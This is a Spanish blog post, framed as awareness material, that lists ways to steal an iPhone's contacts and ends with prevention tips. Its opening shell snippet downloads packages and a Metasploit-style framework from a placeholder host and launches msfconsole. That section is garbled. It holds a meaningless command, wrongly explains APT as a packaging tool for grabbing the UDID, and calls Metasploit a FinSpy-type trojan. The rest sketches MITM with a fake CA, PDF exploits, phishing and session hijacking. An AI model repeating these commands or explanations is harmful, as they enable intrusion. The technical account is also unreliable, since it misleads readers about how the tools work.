Este es un ejemplo de diversos ataques con el fin de obtener la agenda telefónica de un ipod o ipad.
El escrito es puramente documental y con la finalidad de prevenir a los usuarios de este tipo de ataques.
Lo primero que hace un ciberdelincuente es conseguir una herramienta de empaquetado APT (Advance Packing Tool) hecho con C o C++ para debian, con la finalidad de obtener el UDID del iphone y una dirección de correo registrada.
(Aquí solo parte del código)
# Instala treemelo
apt-get update
apt-get dist-upgrade
apt-get install wget subversion
# Descargamos la version de ruby y sus dependencias
wget http://xxxx.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget http://xxxx.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://xxxx.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb
# Instala ponchalo
dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb
# Borra ponchalo
rm -rf *.deb
#Hacemos una variable privada a fin de enganchar los datos
Dpget mail.mai cat var
cd /private/var
#descargan un troyano tipo FinSpy del sitio
svn co https://www.xxxx.com/svn/framework3/trunk/ msf3
cd msf3/
# Corren el rubi descargado anteriormente y reportara la lista de contactos al directorio creado
ruby msfconsole
etc
etc
etc
Otra forma es con un APT de una Fake CA y un mitm: Ya que averiguan su correo y le envian una fake CA para luego hacer un mitm con un rogue AP cercano. Después le mandan a un portal cautivo que le pedira su contraseña de Apple iTunes. Con ella accederan a su backup en iCloud y descargaran los contactos.
Otra forma es
Con un JailOwnMe: si la victima no tiene actualizado el software de su iPhone es vulnerable a los exploit de comex. Le mandan un tweet con un link a un PDF muy tentativo y cuando lo abra tendran una shell con JailOwnMe que permitirá acceder a sus contactos.
También puede ser con un Address Bar Spoofing: si el usuario no tiene iOS 5.1.1 o iOS 6 le envian un link al twitter cuando está twitteando para que entre en un phishing hecho con address bar spoofing y le robaran el password de iCloud. Desde allí descargaran su agenda.
O Si la victima tiene sincronizado su Gmail con su iPhone: Un Phishing burdo por correo electrónico o Twitter, la victima pone su password y se accederá a los contactos de Gmail para descargar su agenda en un csv.
Hasta con un backup involuntario: Si la victima conecta su terminal a un equipo para que se cargue la batería, en un descuido le hacen un backup con el iTunes.
Un programa de ForenseTeniendo acceso físico al dispositivo, lo ponchamos a un Oxygen Forensics y en 10 minutos volcaran todo el terminal un usb.
O a través de un hijacking de Facebook: si la victima tiene iOS 6, ha sincronizado su iPhone con Facebook pero se conecta desde redes WiFi inseguras y le capturan una cookie de sesión de Facebook. Le hacen un hijacking a su cuenta y se descargan todos los contactos.
Inclusive preguntando a Siri: si la victima tiene un iPhone 4S con Siri activado, alguien tiene acceso al dispositivo y se dedica a preguntarle a Siri todos los teléfonos de la agenda que le interesan.
Por último JavaScript Botnet: Si el iPhone de la victima se conecta a una Rogue WiFi que se llama Public o Free. la victima se había conectado anteriormente a una red llamada así y como iPhone no comprueba el BSSID se come una JavaScript Botnet con la que le hacen un Phishing.
Que recomiendo para prevenir:
1.- Tener en todo momento apagado el bluetoot si no se usa
2.- Haga caso omiso a los mensajes directos con links y más si son descargables
3.- Cualquier apertura y cerrado de pantallas anormal poner el dispositivo en modo avión o apagarlo completamente de inmediato.
4.-No sincronice su Iphone a Facebook desde redes desconocidas
5.- No por ser presumido actives siri para ver como hablas con tu equipo, mejor usa los métodos convencionales para consulta.
6.- Cuidado en los sitios que ingresas y el software que descargas puedes ser victima de suplantación fácilmente.
By @edgarulloa
No hay comentarios:
Publicar un comentario